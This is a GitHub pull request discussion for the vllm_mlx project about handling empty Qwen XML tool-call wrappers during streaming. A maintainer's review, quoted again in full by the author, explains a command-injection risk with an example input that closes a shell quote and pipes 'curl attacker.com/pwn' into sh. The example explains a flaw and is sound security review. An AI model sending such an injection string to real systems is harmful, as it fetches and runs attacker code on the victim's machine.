Skip to content

fix: Qwen tool streaming recovery#497

Open
kylejeske wants to merge 2 commits intowaybarrios:mainfrom
kylejeske:fix-qwen-tool-streaming-recovery
Open

fix: Qwen tool streaming recovery#497
kylejeske wants to merge 2 commits intowaybarrios:mainfrom
kylejeske:fix-qwen-tool-streaming-recovery

Conversation

@kylejeske
Copy link
Copy Markdown

Summary

  • synthesize a request-aware tool call when Qwen emits an empty XML tool wrapper
  • pass request context into streaming tool parsers while preserving compatibility with older parser shims
  • defer post-tool streaming content until final decoded text to avoid corrupt partial deltas

Tests

  • uv run ruff check vllm_mlx/ tests/ --select E,F,W --ignore E402,E501,E731,F811,F841
  • uv run black --check vllm_mlx/ tests/
  • uv run pytest tests/test_qwen3_xml_parser.py tests/test_server.py

Notes

  • uv run mypy vllm_mlx/ --ignore-missing-imports --no-error-summary still reports the repository's existing broad type-check baseline; CI marks that job continue-on-error.
  • uv run pre-commit run --all-files also fails on existing full-repo hook issues: old Ruff hook argument parsing, broad line-length findings, and the same Mypy baseline. The CI-equivalent Ruff and Black checks above pass.

@kylejeske kylejeske changed the title Fix Qwen tool streaming recovery fix: Qwen tool streaming recovery May 5, 2026
@kylejeske
Copy link
Copy Markdown
Author

kylejeske commented May 5, 2026

@janhilgard @waybarrios

Stack:

  • MBP M5 Pro
  • Qwen3.6 on mlx-vllm (latest package)
  • Pi Agent

I ran into a scenario where asking the model to run a bash command (list the files in this folder) while streaming resulted in a corrupted output. This PR addresses that.

I've attempted to follow your guide for contributing. Please let me know if there is anything missing.

Copy link
Copy Markdown
Collaborator

@janhilgard janhilgard left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for the contribution and for following the guide! I understand the frustration with empty `<tool_call></>` wrappers — it's a real model failure case. However, this PR takes an approach that's architecturally dangerous for an inference server. Here's why:

Critical: Server-side tool call synthesis is fundamentally wrong

The core of this PR makes the inference server guess which tool the model meant to call and fabricate arguments. This violates the basic contract of an OpenAI-compatible API: the server faithfully reports what the model generates — it never invents content.

Security: Command injection

The synthesis logic extracts paths from user text via regex and inserts them into shell commands:

args["command"] = f"ls -la {_shell_quote_path(target)}"

A malicious (or just unlucky) user message like:

list files in ~/'; curl attacker.com/pwn | sh; echo '

…gets turned into a synthesized bash command by the server. The client trusts tool calls because they came from the model — here they didn't. The _shell_quote_path function won't catch all edge cases (it never can when the server is fabricating shell commands).

Architectural: Hallucinating on behalf of the model

If the model emits an empty <tool_call></tool_call>, the correct responses are:

  1. Return any text before the marker as content
  2. Log a warning about malformed tool output
  3. Let the client/agent framework decide what to do (retry, fallback, etc.)

The server should never decide "the model probably meant bash" based on fuzzy heuristics like regex-matching "list|show|ls|dir" in the user message. This breaks:

  • Deterministic reproducibility (same generation → different behavior depending on user text)
  • Client trust (tool calls are no longer reliably from the model)
  • Audit trails (who called the tool — the model or the server?)

Streaming deferral is too broad

The defer_content_until_finish flag triggers for all responses after tool messages — not just the broken case. This defeats streaming entirely for multi-turn tool-use conversations (which are the majority use case for tool-calling agents), turning every response into a single final chunk.

What to do instead

The real fix is much simpler:

  1. When the parser encounters <tool_call></> or <tool_call></tool_call> with no content, treat it as content (not a tool call) — the model failed to generate a proper tool invocation.
  2. Optionally strip the empty XML wrapper from the returned content.
  3. Log a warning: logger.warning("Model emitted empty tool_call wrapper, treating as content")

The client/agent (in your case "Pi Agent") can then see the empty/garbled response and retry the request. This is the correct layer for recovery logic — the agent framework, not the inference server.

Minor: Good parts

  • Hoisting request.model_dump() into request_dict once (instead of calling it repeatedly) is a nice perf improvement — I'd accept that as a standalone change.
  • The try/except TypeError fallback for the request= kwarg is a reasonable compatibility shim if the streaming parser API genuinely needs request context (for non-synthesis purposes).

tl;dr: An inference server must never fabricate tool calls. The empty-wrapper case should be treated as a generation failure and returned as content (or an empty response), letting the client decide how to recover.

kylejeske added 2 commits May 5, 2026 09:01
Remove server-side synthesis for empty Qwen XML tool wrappers so the inference server no longer guesses tool names or fabricates arguments. Malformed empty wrappers now produce no tool calls and log a warning, leaving recovery to the client or agent framework.

Keep post-tool chat streaming incremental by deriving deltas from cumulative decoded text instead of deferring the entire response until the final chunk.

Add regression coverage for empty wrapper handling, no synthesized shell commands, and post-tool streaming behavior.
@kylejeske kylejeske force-pushed the fix-qwen-tool-streaming-recovery branch from 7138147 to ce33946 Compare May 5, 2026 16:02
@kylejeske kylejeske requested a review from janhilgard May 5, 2026 16:04
@kylejeske
Copy link
Copy Markdown
Author

Thanks for the contribution and for following the guide! I understand the frustration with empty <tool_call></> wrappers — it's a real model failure case. However, this PR takes an approach that's architecturally dangerous for an inference server. Here's why:

Critical: Server-side tool call synthesis is fundamentally wrong

The core of this PR makes the inference server guess which tool the model meant to call and fabricate arguments. This violates the basic contract of an OpenAI-compatible API: the server faithfully reports what the model generates — it never invents content.

Security: Command injection

The synthesis logic extracts paths from user text via regex and inserts them into shell commands:

args["command"] = f"ls -la {_shell_quote_path(target)}"

A malicious (or just unlucky) user message like:

list files in ~/'; curl attacker.com/pwn | sh; echo '

…gets turned into a synthesized bash command by the server. The client trusts tool calls because they came from the model — here they didn't. The _shell_quote_path function won't catch all edge cases (it never can when the server is fabricating shell commands).

Architectural: Hallucinating on behalf of the model

If the model emits an empty <tool_call></tool_call>, the correct responses are:

  1. Return any text before the marker as content
  2. Log a warning about malformed tool output
  3. Let the client/agent framework decide what to do (retry, fallback, etc.)

The server should never decide "the model probably meant bash" based on fuzzy heuristics like regex-matching "list|show|ls|dir" in the user message. This breaks:

  • Deterministic reproducibility (same generation → different behavior depending on user text)
  • Client trust (tool calls are no longer reliably from the model)
  • Audit trails (who called the tool — the model or the server?)

Streaming deferral is too broad

The defer_content_until_finish flag triggers for all responses after tool messages — not just the broken case. This defeats streaming entirely for multi-turn tool-use conversations (which are the majority use case for tool-calling agents), turning every response into a single final chunk.

What to do instead

The real fix is much simpler:

  1. When the parser encounters <tool_call></> or <tool_call></tool_call> with no content, treat it as content (not a tool call) — the model failed to generate a proper tool invocation.
  2. Optionally strip the empty XML wrapper from the returned content.
  3. Log a warning: logger.warning("Model emitted empty tool_call wrapper, treating as content")

The client/agent (in your case "Pi Agent") can then see the empty/garbled response and retry the request. This is the correct layer for recovery logic — the agent framework, not the inference server.

Minor: Good parts

  • Hoisting request.model_dump() into request_dict once (instead of calling it repeatedly) is a nice perf improvement — I'd accept that as a standalone change.
  • The try/except TypeError fallback for the request= kwarg is a reasonable compatibility shim if the streaming parser API genuinely needs request context (for non-synthesis purposes).

tl;dr: An inference server must never fabricate tool calls. The empty-wrapper case should be treated as a generation failure and returned as content (or an empty response), letting the client decide how to recover.

Thanks for the thorough review, a lot of good points here. A bunch of this actually overlaps with an update I already had in flight, so I've folded your feedback into the update. Really appreciate the eye on it.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants